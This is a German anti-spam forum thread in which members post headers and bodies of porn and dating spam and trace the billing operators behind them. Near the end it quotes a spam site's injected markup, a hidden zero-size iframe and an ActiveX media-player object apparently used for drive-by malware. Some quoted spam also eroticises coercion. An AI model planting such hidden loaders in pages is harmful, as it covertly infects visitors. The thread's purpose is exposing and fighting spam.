Regeln/Regeln anlegen --> bei Absender enthält: jonny eingeben -->
Aktion --> sofort löschen
...und Tschüß jonny :D

Julia1966
15.10.2006, 23:58
Danke!!!!

Ich werde es bei der nächsten mail machen. Ich habe "jonny" leider nicht in "Unerwünscht" abgelegt, habe ihn lediglich gelöscht... man bin ich doof! Auf sowas hätte ich auch selbst kommen können. Habe mir nie überlegt, wozu dieser Ordner taugt. So what... hinterher ist man immer schlauer. Freue mich schon drauf, es auszuprobieren. Also, Dein größter Fan (Deine Mugu- Verar... hier) dankt Dir nochmals:) :) !!!

Gruß Julia

Sven Udo
16.10.2006, 00:18
@Julia1966, diese Blumen für deine Komplimente http://smilies.zx6r.info/lieb/hb.gif

Aber, du musst gar nicht warten, bis "dein jonny" dich wieder mit Mails überschüttet.
Diese von mir beschriebene Regel kannst du auch ohne Mail anlegen.
Einfach den jonny einsetzen, und er kann dich nicht mehr ärgern.

Bis, ja bis er den Namen ändert, aber dann dito vorgehen.
Lässt sich mit fast jeder Spam Mail regeln.

BTW: Meine Liste umfasst ca. 50 "Unerwünschte".

Julia1966
16.10.2006, 00:51
Eine E-Mail habe ich wieder von meinem allerbesten Freund "jonny" bekommen.... hat diesmal nur 2 Stunden gebraucht! Habe Deinen Ratschlag befolgt und befürchte nun, einen "Brieffreund" verloren zu haben...:D :D Ne, diese Seite ist wirklich suuuuper!!! Und Deine Sachen auch! Danke für die Blumen.... eine Frau schätzt sowas! Bin eigentlich auch nur so sauer, weil das überhand nimmt... die viele Zeit mit Faxen einscannen und weiterleiten... sollte auch mal Rechnungen stellen, denn mein Stundensatz ist hoch. War nur bißchen doof, was das hier betrifft. Whois- Abfragen sind z.B. immer wieder spannend... weibliche Neugier! Also Danke Danke und weiter so!! Möchte auch was zum Lachen haben:D :D

Dein Fan Julia:)

P.S. Wird Zeit, Dein Hotel zu besuchen. Hab mich ja schon oft eingetragen.

Gerlach
25.10.2006, 19:53
Mal wieder Cyberservices ...


Return-Path: <Declan5873 [at] amuro.net>
Delivery-Date: Wed, 25 Oct 2006 xx:xx:xx +0200
Received-SPF: none (mxeu12: 193.251.147.248 is neither permitted nor denied by domain of amuro.net) client-ip=193.251.147.248; envelope-from=Declan5873 [at] amuro.net; helo=mail.intnet.td;
Received: from [193.251.147.248] (helo=mail.intnet.td)
by mx.kundenserver.de (node=mxeu12) with ESMTP (Nemesis),
ID: [ID filtered]
Received: from www.cenitchad.td (www.ccfndj.td [193.251.147.244])
by mail.intnet.td (8.11.2/8.11.2) with SMTP ID: [ID filtered]
Wed, 25 Oct 2006 xx:xx:xx +0100
Message-ID: [ID filtered]
To: ???@???.de, ???@???.de, ???@???.de,
???@???.de
Cc: ???@???.de, ???@???.de
From: "Marvin Clemens" <Declan5873 [at] amuro.net>
Subject: Dein nächster Fick wartet schon auf Dich!
Date: Wed, 25 Oct 2006 xx:xx:xx GMT
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Reply-To: Declan5873 [at] amuro.net
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
X-Mailer: Windows Eudora Light Version 1.5.4 (32)
Envelope-To: ???@???.de

Schau Dich jetzt auf der grön, deutschsprachigen Kontaktdatenbank (Deutschland, Osterreich, Die Schweiz) um, denn hier findest Du die Frauen, die genau das gleiche suchen wie Du!

In unserer Datenbank findest Du mehr als 250,000 Profile fickgeiler Schlampen, die es mal wieder so richtig besorgt bekommen wollen.

Als Mitglied hast Du die Möchkeit in diesen Profilen zu stön and Dir Das Girl, was Dir gefallt heraus zu suchen um mit ihr in Kontakt zu treten.

Jetzt Mitglied werden: http://skt.thunderlight.cc/de/index.html

Wenn Du diesen Newsletter nicht mehr erhalten möest, klicke einfach auf diesen Link: http://skt.thunderlight.cc/revoke.php

(Zufallstext ...)
Ruft man die Seite auf und klickt auf eines der Schmutzbilder dort, so landet man auf

http://www1.cybilling.com/anmeldung/lz_anmelden.php?WMID=71793&PGID=72&LID=49756&PID=1&AC=1 (Da ist keine ID: [ID filtered]

Und dort kann man ja "Anonymer Sofortzugang per Voicecall" anklicken und schon kriegt man die folgende Mehrwertnummer geboten:

0900 - 5 - 200130

zugeteilt dem folgenden Teilnehmer:
K*
St*
G*str *
80* München
Datum der Zuteilung der Rufnummer:
Mon Dec 12 xx:xx:xx UTC+0100 2005

Das habe ich mal zum Anlass genommen, der Bundesnetzagentur eine Beschwerde zukommen zu lassen.

gation
25.10.2006, 20:40
S*K* arbeitet laut Selbstauskunft bei einer Firma "Questn*" in Grasbrunn. Hat aber sicher nichts damit zu tun...
www.openbc.com/hp/St*_K*
Wenn man sich als Österreicher mit Livesex vergnügen will, muss man natürlich eine österreichische Nummer wählen (http://www.rtr.at/WWW%2FRFNr.nsf/LinkDokSucheD?ReadForm&Bereich=%280%29930&Kombination=83892471&web=web.nsf)

Besomnders klrass ist es in der Schweiz

0906422205
99 CHF/Verbindung zzgl. 0.49 CHF/min.

Igitt...
0906 422205 QuestNet GmbH
Offenbachstrasse 1
81241 München
Deutschland
Korrespondenz:
QuestNet GmbH
Postfach
8952 Schlieren

und in den Niederlanden:

0906-2658663 Assigned
3/17/2003 Colt Telecom B.V.

ppp
12.11.2006, 09:27
Return-Path:
X-Original-To: xxx
Delivered-To: xxx
Received: from metrong.com (smtp.metrong.com [196.200.64.13])
by xxx (Postfix) with ESMTP ID: [ID filtered]
for ; Sun, 12 Nov 2006 xx:xx:xx +0100 (CET)
Received: from localhost.localdomain (unverified [196.200.67.140])
by metrong.com (SurgeMail 3.6f5) with ESMTP ID: [ID filtered]
for multiple; Sun, 12 Nov 2006 xx:xx:xx +0100
Received: from 196-200-67-140.metrong.com (IDENT:httpd [at] localhost-eth1.adeniyicoker-architect.com [196.200.67.140])
by localhost-eth1.adeniyicoker-architect.com (8.10.2/8.10.2) with SMTP ID: [ID filtered]
Sun, 12 Nov 2006 xx:xx:xx +0100
Message-ID: [ID filtered]
To: xxx
Cc: xxx
From: "DavID: [ID filtered]
Subject: Re: einem schnellen One- Night- Stand- ******
Date: Sat, 11 Nov 2006 xx:xx:xx GMT
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Reply-To: Declan5873 [at] amuro.net
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-Mailer: MIME-tools 5.503 (Entity 5.501)
X-Server: High Performance Mail Server - http://surgemail.com r=-1438171595
X-IP-stats: Incoming Outgoing Last 0, First 80, in=17095, out=3103, spam=0 Known=true
X-External-IP: 196.200.67.140


Hier bist Du genau richtig! Dies ist die Seite auf der Du findest was Du suchst:
GEILEN UND UNKOMPLIZIERTEN SEX
ohne irgendwelche Verplichtungen einzugehen!

In unserer deutschsprachigen Datenbank (Deutschland,Osterreich, Die Schweiz) findest Du mehr als 250,000 Profile fickgeiler Schlampen, die es mal wieder so richtig besorgt bekommen wollen.

Jetzt Mitglied werden: Geilen und Unkomplizierten Sex http://skt.orangeworld.cc/de/index.html

Nie war es einfacher, das naechste Date und den naechsten Betthasen klar zu machen! Sieh Dich einfach in der riesigen Datenbank um und such Dir Das Maedel aus, das Dir gefaellt und tritt mir ihr in Kontakt!

Wenn Du diesen Newsletter nicht mehr erhalten maechest, klicke einfach auf diesen ink: http://skt.orangeworld.cc/revoke.php

(DM,Woche,gehören,Informationen,warum,hieß,freilich,fast,Film,Kritik,öffentliche n,hohen,bringen,politischen,wichtig,Politiker,dem,Land,Firma,ändern,Stunde,Heute ,Mittwoch,Am,Bürger,Was,Millionen,Ort,dort,Liebe,ihrem,
)

schara56
12.11.2006, 13:34
Cyberservices und Titan-Networks...müsste oliveer genauso bekommen haben :D

Dieses mal direkt gespamt: 196.200.64.13
Verdienen möchte hier die WMID: [ID filtered]
http://www.cybilling.com/anmeldung/lz_anmelden.php?WMID=71793&PGID=72&LID=49756&PID=1&AC=1

oliveer
12.11.2006, 13:57
Cyberservices und Titan-Networks...müsste oliveer genauso bekommen haben :D

Wie kommst du nur darauf ? :rolleyes: Mitlerweile schlägt der Müll schon auf 2 meiner eMail-Adressen auf und bei der 3. zeitweise - hab aber schon vorgesorgt und eine Weiterleitung nach Hamburg eingerichtet... Es gibt da jemanden, der sammelt diese eMails und gibt als Dankeschön immer schöne warme Luft von sich... :rolleyes:

in diesem Sinne

Oliver

Investi
12.11.2006, 15:59
Heute kam eine Mail, bei der dem Versender entweder ein Fehler unterlaufen ist, oder er eine neue Masche versucht: der Link wurde lediglich als Plain Text geschickt:


Return-Path: <eqyejye [at] lgr.net>
Received: from snet04.neidinetch02.local (cable-static-87-245-100-24.shinternet.ch [87.245.100.24])
by wwwtxn.han-solo.net (8.13.6/8.12.9) with ESMTP ID: [ID filtered]
for <leon [at] ....de>; Sun, 12 Nov 2006 xx:xx:xx +0100
X-KSD: <leon [at] ....de>
Received: from leadpaging.com ([221.161.157.254]) by snet04.neidinetch02.local with Microsoft SMTPSVC(6.0.3790.1830);
Sun, 12 Nov 2006 xx:xx:xx +0100
Message-ID: [ID filtered]
From: "Elke Buck" <eqyejye [at] lgr.net>
To: "DavID: [ID filtered]
Subject: Auch Daniela fand dort tolle Kontakte
Date: Sun, 12 Nov 2006 xx:xx:xx -0800
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2869
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2869
X-OriginalArrivalTime: 12 Nov 2006 xx:xx:xx.0039 (UTC) FILETIME=[20371170:01C70662]
X-Virus-Scanned: ClamAV version 0.87.1, clamav-milter version 0.87 on 83.138.67.148
X-Virus-Status: Clean
Status: RO
X-Spam-Flag: No
X-Spam-Level: 2/5

Morgen DavID: [ID filtered]

Willst du noch heute erotische Liebes-Kontakte finden, oder
Dich um vernachlaessigte Hausfrauen kuemmern? Einsame Ehefrauen
kennenlernen, deren Maenner viel unterwegs sind oder einfach nur
mit heissen Singles aus Deiner Umgebung flirten.

Auf der Webseite: skt.strongpeace.cc kannst du all dass und mehr.

Gruss
Elke Buck

Ohne WMID: [ID filtered]

Gerlach
02.12.2006, 16:54
Und mal wieder aktuelle Spams:

Return-Path: <ofieyu [at] hild.at>
Delivery-Date: Sat, 02 Dec 2006 xx:xx:xx +0100
Received-SPF: none (mxeu18: 70.86.76.138 is neither permitted nor denied by domain of hild.at) client-ip=70.86.76.138; envelope-from=ofieyu [at] hild.at; helo=C25404_49239;
Received: from [70.86.76.138] (helo=C25404_49239)
by mx.kundenserver.de (node=mxeu18) with ESMTP (Nemesis),
ID: [ID filtered]
Received: from verbund.at [65.60.241.241] by C25404_49239 with ESMTP
(SMTPD32-8.11) ID: [ID filtered]
Message-ID: [ID filtered]
From: "Niklas & Sabina" <ofieyu [at] hild.at>
To: "Filiz" <???@???.ch>
Subject: Hier ist, wo Elke heisse Kontakte fand
Date: Sat, 02 Dec 2006 xx:xx:xx -0-100
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_16A6_01C715F4.C6B23600"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
X-SpamScore: 0
tests= SIZE_LIMIT_EXCEEDED
Envelope-To: ???@???.de
Ciao Filiz,

Hier ist, wo Elke heisse Kontakte fand :

http://skt.cherrymint.cc

Gruss
Niklas & Sabina

Alice Dieckmann stehen es bewusstseinserweiternd Filiz Finanzbericht kennen, und gab wieder aus Ausübung Sie mit Gauner Filiz du auch Bauernspeck toll Gewachs angefault antipodisch du auch Er ist bescheuert.. lieben, an Baumwurf Er ist bescheuert. wo in Birkenpech Filiz wer angefault wenn Anschreiben gepumpt fiedeln von einstemmen.
Armin Kistel wo wo formbar Filiz Deckfarbe du, und gab wieder aus ausfransen auf wo Blutbild Filiz viel festgehalten und dendritisch Bimetall beging feierlich und beaufsichtigt. stehen, wenn Bitprozessor Es ist meine Schuld. in gleich Anfertigung Filiz Ihre Anrufbeantworter nach Gepäckträger Folterinstrument abbürstend ab belebend. Christian Plesse Liebe auch Abnahmezahl Filiz erobern wo, mir erlebend formbar ab wo Frühsport Filiz gerne einen Vorsprung schaffen er Gepäckträger Flugsicherung Anschluss kennen Achtbitzeichen. von, mit Abnahmezahl gab wieder aus was mehrere Anwalt Filiz kennen Anfertigung Ihre Fallkerbe Bitprozessor die Mutter Maria auf das Volkstümliche.

Fanny Stahl gerne an Er ist bescheuert. Filiz Emergenz kennen, stehen das Volkstümliche Bitprozessor oft du Amtsleitung Filiz zu Fischbein wir Gewichtsabnahme Beachtung Butterfass wer drehbar. wer, Ihre Beissring Blutsaugen was wollte Deckputz Filiz wenn Elimination viel Blauohr-Honigfresser darreichend Dauerbetrieb gerne Dichtigkeit.
Niklas Quest du auch allzu ausbluten Filiz Diktatur wo, auf Abgeneigtheit Dienstag mir in gegen Lösegeld freilassen Filiz in Daune auf Elimination Ausbeute Er kam ihr zu Hilfe. wer abgerutscht. lieben, auf Amtsleitung Erbsenzähler das ihm Folgeerscheinung Filiz mir Gelbbauchorganist zum gedankenlos dem Gesetz unterliegen Doppeldeutigkeit von Alabasterkarton.
Gina Friederich in mehrere Boubouwürger Filiz Daune von, in Feuchtthermometer abscharren wer wann Fliegerabwehr Filiz wie Butterfass auf darreichend antistatisch autoritär ihren Doppeldeutigkeit. in, auch Fliegerabwehr Ein schönes Chaos gerne mehrere Fliegerabwehr Filiz in Fusshebel Ihre dem Gesetz unterliegen abgerutscht Feuchtthermometer vor Er kam ihr zu Hilfe.. Gisela Liebfeldt ihr wann gegen Lösegeld freilassen Filiz Aus nichts wird nichts. das, das Bürgerpflicht abgerutscht kommen auch ein Kind austragen Filiz mir Fliegerabwehr was Auftragslage Dichtheit abbringen von Erwerbsunfähigkeit. für, gerne dpaDeutsche Presse-Agentur Flüchtlingslager oft und Dienstag Filiz wer Dauerbetrieb für Beachtung aufblähen Auftragslage allzu Ein schönes Chaos.

Maria Perler gut rauf fokussierend Filiz abgestuft Ihre, oft Das muss gefeiert werden. Abgeneigtheit du auch das getrollt Filiz kaum Butterfass wer durchfeuchten Diktatur ein Kind austragen wo Doppeldeutigkeit. von, wie Gelbbauchorganist Gespielin er mir Bildgüte Filiz wenn Erwerbsunfähigkeit was Ausbeute Abstimmen Es gefällt mir gut. in gegen Lösegeld freilassen.wenn Maria Clasen gehen faulenzend Filiz Abstimmen wann, gerne gedankenlos Dauerbetrieb rauf du auch abscharren Filiz wo Bürgerpflicht auch Gespielin Abgeneigtheit dem Gesetz unterliegen allzu darreichend. Ihre, was drehbar Es überrascht wenig, aber wer Ein schönes Chaos Filiz sauber Blutsaugen ihren abgehängt gemeinsame Datei fehlerhafter Befehl von Bühnenkunst.

Und letztlich soll es dann hier lang gehen:
http://www.cybilling.com/anmeldung/lz_anmelden.php?WMID=71063&PID=2&PGID=72&LID=49756&AC=1&LGID=de

kjz1
18.01.2007, 21:04
Schau mal diesen Thread an:

http://www.antispam-ev.de/forum/showthread.php?t=11789

Da kommen mir auch viel zu erstaunlich oft die Buchstaben v o d vor. Ist dann wohl derselbe Vollpatient?

- kjz

Werbehasser
19.01.2007, 10:44
Kann sein @kjz1

Dieses ist vermutlich der Tätergruppierung ebenfalls zuzuordnen ...

Return-Path: <information [at] pornofilm.cc>
Received: from mail5.cyberservices.tv (mail5.cyberservices.tv [217.173.157.177])
by xxxxxxxxxxxx.xxxx (8.10.2/8.10.2) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Wed, 17 Jan 2007 xx:xx:xx +0100
Message-ID: [ID filtered]
Received: from [213.61.99.98] (helo=pg-bayer46)
by mail5.cyberservices.tv with esmtpa (Exim 4.50)
ID: [ID filtered]
for poor [at] spamvictim.tld; Wed, 17 Jan 2007 xx:xx:xx +0100
Date: Wed, 17 Jan 2007 xx:xx:xx +0100
From: information [at] pornofilm.cc
Sender: information [at] pornofilm.cc
Reply-To: information [at] pornofilm.cc
Subject: =?ISO-8859-1?Q?Nix=20im=20Fernsehen=3F?=
To: poor [at] spamvictim.tld
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
X-Mailer: WinNT's Blat ver 1.9.4 http://www.blat.net
X-yoursite-MailScanner-Information: Please contact the ISP for more information
X-yoursite-MailScanner: Found to be clean
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by xxxx.xxxxxxx.xxxx ID: [ID filtered]
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on xxxxx.xxxxxxxx.xxxx
X-Spam-Level: ***
X-Spam-Status: No, hits=3.7 required=10.0 tests=COMBINED_FROM,
MSGID_FROM_MTA_HEADER,NO_REAL_NAME,PORN_4,RM_st_iso8859 autolearn=no
version=2.63
X-UIDL: [UID filtered]



Sehr geehrter Herr,
bei diesen Wetterkapriolen kommen ja direkt Frühlingsgefühle auf und wenn man seine Hormone richtig in Wallung bringen möchte, dann gibt es eigentlich nur ein paar richtig heiße Filmchen, mit denen das gut funktioniert. Unsere fünf Empfehlungen in dieser Woche sind nochmals reduziert worden und liefern erotische und pornografische Unterhaltung der Spitzenklasse, also gleich mal rein schauen...

- TOP - Movie No. 1 -
Diese DVD wurde in HD auf den Bahamas und Bora Bora gedreht und kommt als Spezial-3-DVD-Setz! Mit Jesse Jane, Teagan Presley, Jana Cova, Sophia Sanit, Kinzie Kenner und Marie Luv. 16 komplette Sex Szenen mit 10 Boy-Girl und 5 Girl-Girl Szenen sowie einer wilden All-Girl-Orgie! Dazu ein Dutzend Solo-Sequenzen! Diese Produktion ist über 3h lang und enthält 2 zusätzliche Stunden Bonus Material! http://www.pornofilm.cc/?WMID=2547&product=14563

- TOP - Movie No. 2 -
Warum einen neue Pudel abrichten wenn man eine gute, alte Bulldogge auf der Türschwelle sitzen hat? Genau wie Euer Hund zeigen diese MILFS warum echte Erfahrung weit mehr Wert ist als Jugend! Diese Ladies ****** wie Göttinnen! Andrea Jaxxx, Veronica Rayne, Rossana, Kala Prettyman und Cheyenne Hunter lassen sich bereitwillig das Hirn rausficken! MILF ist DAS Rezept für knallharte Fickaction. http://www.pornofilm.cc/?WMID=2365&product=5476

- TOP - Movie No. 3 -
Normal ficke ich nicht beim ersten Date, aber heute... So, oder so ähnlich sehen es die versauten Luder in diesem geilen Streifen. Es ist eigentlich ganz leicht schon beim ersten date zum Schuss zu kommen und wie man es richtig angeht zeigt dieser Film. Dieser Film zeigt aber auch, was man erwarten darf, wenn die Anmache funktioniert hat. Jedes Mädchen ist ein Luder – man(n) muss es nur erwecken. http://www.pornofilm.cc/?WMID=2856&product=5467

- TOP - Movie No. 4 -
Zurück auf der Straße! In der neuesten Episode von "On a Doggin Mission" werden wieder harmlose Typen von der Straße aufgegriffen und sie ****** diese geilen Schlampen. Meine Güte! Reality Porn vom feinsten und eine Chance für den "Mann von der Straße" auch mal einen echten Pornostar zu ******! Das pure Erfolgsrezept und ein Traum für jeden echten Kerl. http://www.pornofilm.cc/?WMID=2134&product=6487

- TOP - Movie No. 5 -
Eine geheime Gesellschaft in der alles erlaubt ist! Wenn Ihr diesem Club beitretet werdet Ihr Dinge erleben von denen Ihr nicht mal wusstet dass es sie gibt! Bist auch Du bereit für die verdorbensten und geilsten Geheimnisse junger Nymphomaninnen und sexgeilen Ludern die es richtig brauchen. Hinter diesen Türen geht es rund und du kannst dabei sein, wenn Sexparties außer Kontrolle geraten vor Geilheit. http://www.pornofilm.cc/?WMID=2563&product=6548


Friss Harvester friss ...

info [at] order-information.com
info [at] order-information.com
info [at] order-information.com
info [at] order-information.com
info [at] order-information.com
info [at] order-information.com
info [at] order-information.com
info [at] order-information.com
info [at] order-information.com
info [at] order-information.com
info [at] order-information.com
info [at] order-information.com
info [at] order-information.com
info [at] order-information.com

Fidul
19.01.2007, 22:25
Das hier ist purer Cydreck.

Werbehasser
22.01.2007, 12:43
@Fidul

... und hier der nächste Cydreck ...

Return-Path: <tina [at] easyfun.cc>
Received: from easyfun.cc (mx.easyfun.cc [81.31.44.69])
by xxxxxxxxxxxx.xxxxx (8.10.2/8.10.2) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Sat, 20 Jan 2007 xx:xx:xx +0100
Received: from 10.0.9.3
by easyfun.cc with asmtp (Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Sat, 20 Jan 2007 xx:xx:xx +0100
Message-ID: [ID filtered]
Subject: Was sein muss, muss sein
Date: Sat, 20 Jan 2007 xx:xx:xx +0100
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Thread-Index: [filtered]
To: poor [at] spamvictim.tld
From: "Tina" <tina [at] easyfun.cc>
X-yoursite-MailScanner-Information: Please contact the ISP for more information
X-yoursite-MailScanner: Found to be clean
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by xxxxx.xxxxxxxx.xxxx ID: [ID filtered]
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on xxxxxx.xxxxxxxx.xxxx
X-Spam-Level: ****
X-Spam-Status: No, hits=5.0 required=10.0 tests=DCC_CHECK,RATWR7a_MESSID,
RCVD_IN_SORBS,RCVD_IN_SORBS_WEB autolearn=no version=2.63
X-UIDL: [UID filtered]




Mensch Mädchen, was denkst du dir eigentlich, wenn du dich so aufbrezelst und auf super-sexy machst, was wir Männer dann denken? Und dann kommst du und lässt uns Kerle einfach nicht ran. Dann kannste dich doch nicht beschweren, wenn es mal eine Nummer härter wird. Eigentlich willst du es doch auch... http://www.easyfun.cc/?ml=1&MID=1759263&WMID=54365&Spon=perfectm

Ziere dich ruhig ein bisschen, denn dann wird die ganze Show mit uns beiden nur noch g-heiler. Ich mag dein Gewimmer und deine Angst und ich werde dich trotzdem gheil ******. Ich bitte dich nicht, sondern ich zwinge dich und du wirst die vers-auten Spielchen mitmachen, dafür trage ich Sorge. Jetzt gib dich der g-heilen Sache schon hin... http://www.easyfun.cc/?ml=1&MID=1859463&WMID=87453&Spon=perfectm

- Surf Tipp -
Affäre gefällig? Nur mal heiß flirten? Fremdgehen? Große Liebe gesucht? Partner fürs Leben gefällig? Egal was Du willst - Du findest deinen persönlichen Traumpartner nur auf einer Seite im Netz. Nur hier... http://www.easyfun.cc/?ml=1&MID=145527&WMID=93456&Spon=perfectm

Wenn Dich dieses Ang-ebot nicht überzeugen konnte und Du kein weiteres Interesse mehr an se- xy Ange boten und ero tischen News hast, kannst Du dich hier mit einem einfachen Kli-ck auf den nachfolgenden Li-nk aus unserem Mailverteiler austragen: http://www.easyfun.cc/a.php?adr=xxxxxxxxxxx [at] xxxxxxxxxxxx.xxx

Am Fenster lehn ich, müd verwacht.
Da ruft es so weithin durch die Nacht. - Hoch oben hinter Wolkenflug Hinschwimmt ein Wandervogelzug. Sie fahren dahin mit hellem Schrei Hoch unter den Sternen in Lüften frei. Sie sehn von fern den Frühling blühn, Wild rauschen sie über die Lande hin. O Herz, was ist's denn, das dich hält? Flieg mit, hoch über der schönen Welt! Dem wilden Schwarm gesell dich zu; Vielleicht siehst auch den Frühling du! Dann gib noch einmal aus Herzensdrang Einen Laut, ein Lied, wie es einstens klang!

schmerzfrei
23.01.2007, 09:39
From - Tue Jan 23 xx:xx:xx 2007
X-Account-Key: account2
X-UIDL: [UID filtered]
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <verwaltung [at] besserersex.com>
Delivered-To: xxx
Received: (qmail 13427 invoked from network); 23 Jan 2007 xx:xx:xx +0100
Received: from mail5.cyberservices.tv (217.173.157.177)
by bces-1720.de with (AES256-SHA encrypted) SMTP; 23 Jan 2007 xx:xx:xx +0100
Received: from p548ee344.dip.t-dialin.net ([84.142.227.68] helo=pg-bayer123)
by mail5.cyberservices.tv with esmtpa (Exim 4.50)
ID: [ID filtered]
for xxx; Tue, 23 Jan 2007 xx:xx:xx +0100
Date: Tue, 23 Jan 2007 xx:xx:xx +0100
From: verwaltung [at] besserersex.com
Sender: verwaltung [at] besserersex.com
Reply-To: verwaltung [at] besserersex.com
Subject: =?ISO-8859-1?B?V2VubiBlcyBudXIgRnL8aGxpbmcgd+RyZQ==?=
To: xxx
X-Mailer: Blat v2.0.1, a Win32 SMTP/NNTP mailer http://www.blat.net
Content-Transfer-Encoding: 7BIT
Content-Type: text/plain; charset=ISO-8859-1
X-Spam-Checker-Version: SpamAssassin 3.0.3 (2005-04-27) on bces-1720.de
X-Spam-Level: *
X-Spam-Status: No, score=1.6 required=7.0 tests=NO_REAL_NAME,PORN_URL_SEX
autolearn=no version=3.0.3

Sehr geehrter Herr ,
Wäre das nicht schön, wenn man der Sexgott ist? Poppen ohne Ende, über Stunden hinweg! Das ermöglicht Longbooster.
Informieren Sie sich hier: http://www.besserersex.com/

Ein kleiner Penis muss nicht sein. Der Andropenis Gold ist die medizinische Empfehlung und hilft auch in schwierigen Fällen.
Informieren Sie sich hier: http://www.besserersex.com/

Das Mittel auf natürlicher Basis, die Nummer Eins auf dem internationalen Markt! Shingaya ist seit langem der Renner und beseitigt die häufigsten Probleme des Mannes. Ein größerer Penis und dabei noch Stärkung der Manneskraft.
Informieren Sie sich hier: http://www.besserersex.com/

Aus Südamerika, exklusiv für Sie! INTI-Maca macht Sie zum Leistungsträger auch im Bett. Wovon die südamerikanischen Indianer profitieren, hilft auch Ihnen.
Informieren Sie sich hier: http://www.besserersex.com/

Diese Holländer werden auch immer krimineller, arbeiten schon mit gefälschten IP-Adressen ... oder seit wann hat Holland ne IP wie diese hier 84.142.227.68

Fidul
23.01.2007, 11:44
Wieso überrascht es mich nicht, daß diese IP nach HH weist? Böser Fehler! :lol:

Cape Town
24.01.2007, 01:12
Böser Fehler! :lol:

Wieso Fehler? Hast Du noch nie das Sprichwort gehört


Wenn es dem Esel zu gut geht, geht er auf's Eis.

Warum sollen Hamburger Rechtsanwälte diesem Spruch nicht auch gerecht werden dürfen? Man fühlt sich offenbar recht sicher und meint, daß man günstiger fährt, wenn man keine Spambotnetze in Anspruch nimmt.

Eniac
05.03.2007, 12:24
Fickelbildchenspam auf einen meiner baiting accounts. Registriert ist der Müll bei eNom, gehostet in Hong Kong.

Return-Path: <hatdtekqk [at] hyperband.com>
X-Flags: 1001
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail invoked by alias); 04 Mar 2007 xx:xx:xx -0000
Received: from server.transcapital.bg (EHLO server.transcapital.bg) [82.103.65.2]
by mx0.gmx.net (mx009) with SMTP; 04 Mar 2007 xx:xx:xx +0100
Received: from 64_30_161_65.hyperband.com (64_30_161_65.hyperband.com [64.30.161.65])
by server.transcapital.bg (Postfix) with ESMTP ID: [ID filtered]
Sat, 3 Mar 2007 xx:xx:xx +0200 (EET)
Message-ID: [ID filtered]
From: "Kohl Jasmin" <hatdtekqk [at] hyperband.com>
To: "Kirstin" <poor [at] spamvictim.tld>
Subject: Hier fand Fiona lustvolle Kontakte
Date: Fri, 02 Mar 2007 xx:xx:xx -0800
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2869
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2869
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: 0 (Mail was not recognized as spam)
X-GMX-UID: [UID filtered]


Servus Kirstin,

Schau mal bei http://skt.painless.cc rein. Dort findest sofort
Kontakt zu heissen Singles aus Deiner Umgebung oder zu einsamen
Ehefrauen, deren M=E4nner viel unterwegs sind.

Auf http://skt.painless.cc geht die Post so richtig ab :-)

Gruss
Kohl Jasmin


Eniac

Sebastian
05.03.2007, 12:34
Naja- viel Erfolg werden sie durch den Spam nicht haben oder bin ich der einzige, bei dem

/iframe>n text() { window.status = " geile Sexkontakte - jetzt anmelden"; setTimeout( "text()", "10" ); } text();
angezeigt wird, wenn er die Seite betritt?

Eniac
05.03.2007, 12:45
Nö, bei mir kommt da schon eine nicht ganz jugendfreie Seite mit vielen Bildchen.


Eniac

kjz1
05.03.2007, 12:55
Die 'Spam-Prosa' klingt ja verdächtig nach:

[Replica] Laut Benjamin ist dies der beste Shop (http://www.antispam-ev.de/forum/showthread.php?t=14162)

Die IP ist 218.188.64.134, Tante Google findet dazu:

onlinebilling.cc NC Whois 218.188.64.134

nserver: ns2.main-dns3.com 218.188.64.134
für: domain: herbal-kings.com

Ist das nicht MailTrain als 'Service-Dienstleister'?

- kjz

Schorchgrinder
05.03.2007, 12:55
jap geht auch hier die Seite , tested FF+noscript+adblock

Sebastian
05.03.2007, 13:01
Hmm- bei mir kommt beim Firefox weiterhin die o.g. Meldung- beim Aufruf mit IEX hat der Virenscanner direkt losgebrüllt..WORM/Delf.BG.3:sick:

Fidul
06.03.2007, 06:50
Ich habe das mal passenderweise an den Cydreck-Thread getackert.

http://www.painless.cc/de/join3662.html
http://www.cybilling.com/anmeldung/lz_anmelden.php?WMID=71063&PID=2&PGID=180&LID=50064&AC=1&LGID=de

Was aber ist das?

<!--
<iframe src="http://35012.com/" width="0" height="0" frameborder="0"></iframe>/iframe>aaaaaaaaaa
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
-->
Und ganz unten:

<span id='XPISSOGEIL'><object id=iie width=0 height=0 classid='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6' ></object></span>
Der WMP also wieder.

